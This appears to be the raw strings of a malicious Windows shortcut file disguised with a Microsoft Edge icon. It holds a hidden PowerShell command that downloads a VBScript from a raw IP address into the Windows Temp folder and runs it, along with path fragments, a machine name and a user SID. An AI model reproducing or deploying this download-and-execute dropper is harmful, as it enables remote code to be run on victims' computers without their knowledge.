Windows
System32
WindowsPowerShell
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
arglobal-inc
BWindows
System32
WindowsPowerShell
Opowershell.exe
MicrosoftE..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe9C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden curl http://192.210.175.4/TSTA/1/IE_root.vbs -o C:\Windows\Temp\Debug.vbs ;Start-Process C:\Windows\Temp\Debug.vbs9%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe
S-1-5-21-1919227603-66969571-1292475110-1001